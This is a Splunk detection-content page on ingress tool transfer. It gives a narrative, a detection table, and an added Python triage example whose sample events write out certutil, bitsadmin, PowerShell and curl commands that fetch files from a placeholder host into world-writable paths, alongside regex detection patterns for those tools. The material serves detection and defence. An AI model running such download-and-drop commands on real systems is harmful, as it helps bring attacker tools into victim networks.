Description

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the Command And Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-03-24
  • Author: Michael Haag, Splunk
  • ID: b3782036-8cbd-11eb-9d8e-acde48001122

Narrative

Ingress tool transfer is a technique under the Command And Control tactic. Behaviors include the use of living-off-the-land binaries to download implants or other binaries over alternate communication ports. It is imperative to baseline applications on endpoints to understand which of them generate network activity, where they connect to, and what their native behavior is. When abused, these utilities write files to disk in world-writable paths. During triage, review the reputation of the remote public destination IP or domain, capture any files written to disk and analyze them, and review other parallel processes for additional behaviors.
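As an added example (not part of this story and not Splunk's own detection content), the Python below applies the narrative's triage logic to constructed Endpoint.Processes-style events: it flags the download-capable utilities named in the detection list when their command line carries a URL, escalates to TTP when the drop path is world writable, suppresses a baselined application, and records the remote destination for reputation review. The binary names, argument markers, path list, field names and sample events are all assumptions made for the example.

```python
import re
from urllib.parse import urlparse
# Download-capable living-off-the-land binaries from this story's detection list, paired with
# the argument that marks a transfer (assumed patterns; this is not Splunk's own SPL logic).
LOLBIN_MARKERS = {
    "certutil.exe": re.compile(r"-urlcache|-verifyctl", re.I),
    "bitsadmin.exe": re.compile(r"/transfer|/download", re.I),
    "powershell.exe": re.compile(r"DownloadFile|DownloadString", re.I),
    "curl": None, "wget": None,  # any curl/wget that fetches a URL counts
}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
# World-writable staging paths the narrative names as where abused utilities drop files.
WRITABLE_RE = re.compile(r"[A-Za-z]:\\(?:Users\\Public|Windows\\Temp)\\|\\AppData\\Local\\Temp\\|"
                         r"(?<![\w/])/(?:tmp|var/tmp|dev/shm)/", re.I)

def classify(event, baseline=frozenset()):
    """Return ("TTP"|"Anomaly", remote_host) for an Endpoint.Processes-style event, else None."""
    name, cmd = event["process_name"].lower(), event["process"]
    if name not in LOLBIN_MARKERS:
        return None
    marker, url = LOLBIN_MARKERS[name], URL_RE.search(cmd)
    if url is None or (marker and not marker.search(cmd)):
        return None
    remote = urlparse(url.group(0)).hostname
    if (event["host"], name, remote) in baseline:  # baselined app reaching its known destination
        return None
    if WRITABLE_RE.search(cmd):  # URL plus a drop into a world-writable path: report as TTP
        return ("TTP", remote)
    return ("Anomaly", remote)   # URL fetched with no visible drop path (e.g. DownloadString)

def triage(events, baseline=frozenset()):
    # Group hits per host with the remote destinations whose reputation should be reviewed.
    out = {}
    for ev in events:
        hit = classify(ev, baseline)
        if hit:
            out.setdefault(ev["host"], []).append((ev["process_name"], *hit))
    return out

# Constructed sample events (not real telemetry), shaped like Endpoint.Processes fields.
EVENTS = [
    {"host": "ws01", "process_name": "certutil.exe",
     "process": r"certutil.exe -urlcache -split -f http://files.example.invalid/a.exe C:\Users\Public\a.exe"},
    {"host": "ws01", "process_name": "certutil.exe", "process": r"certutil.exe -hashfile C:\Tools\setup.msi SHA256"},
    {"host": "ws02", "process_name": "bitsadmin.exe", "process": r"bitsadmin /transfer j /download http://files.example.invalid/b.dll C:\Windows\Temp\b.dll"},
    {"host": "ws03", "process_name": "powershell.exe", "process": "powershell -c (New-Object Net.WebClient).DownloadString('http://files.example.invalid/s.ps1')"},
    {"host": "lx01", "process_name": "curl", "process": "curl -s http://files.example.invalid/x.sh -o /tmp/x.sh"},
    {"host": "lx02", "process_name": "curl", "process": "curl -s https://health.example.invalid/status"},
]
BASELINE = {("lx02", "curl", "health.example.invalid")}  # known-good monitoring check on lx02
```

The baselined lx02 check drops out of `triage(EVENTS, BASELINE)` while the same curl on an unbaselined host would surface as an Anomaly, which is the reason the narrative insists on baselining before tuning these rules.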

Detections

| Name | Technique | Type |
| --- | --- | --- |
| Any Powershell DownloadFile | Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer | TTP |
| Any Powershell DownloadString | Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer | TTP |
| BITSAdmin Download File | BITS Jobs, Ingress Tool Transfer | TTP |
| CertUtil Download With URLCache and Split Arguments | Ingress Tool Transfer | TTP |
| CertUtil Download With VerifyCtl and Split Arguments | Ingress Tool Transfer | TTP |
| Curl Download and Bash Execution | Ingress Tool Transfer | TTP |
| Detect Certify Command Line Arguments | Steal or Forge Authentication Certificates, Ingress Tool Transfer | TTP |
| Detect Certipy File Modifications | Steal or Forge Authentication Certificates, Archive Collected Data | TTP |
| Linux Curl Upload File | Ingress Tool Transfer | TTP |
| Linux Ingress Tool Transfer Hunting | Ingress Tool Transfer | Hunting |
| Linux Ingress Tool Transfer with Curl | Ingress Tool Transfer | Anomaly |
| Linux Proxy Socks Curl | Proxy, Non-Application Layer Protocol | TTP |
| Suspicious Curl Network Connection | Ingress Tool Transfer | TTP |
| Wget Download and Bash Execution | Ingress Tool Transfer | TTP |
| Windows Bitsadmin Download File | BITS Jobs, Ingress Tool Transfer | TTP |
| Windows CertUtil URLCache Download | Ingress Tool Transfer | TTP |
| Windows CertUtil VerifyCtl Download | Ingress Tool Transfer | TTP |
| Windows Curl Download to Suspicious Path | Ingress Tool Transfer | TTP |
| Windows Curl Upload to Remote Destination | Ingress Tool Transfer | TTP |
| Windows Powershell DownloadFile | Automated Exfiltration | Anomaly |

Reference

source | version: 1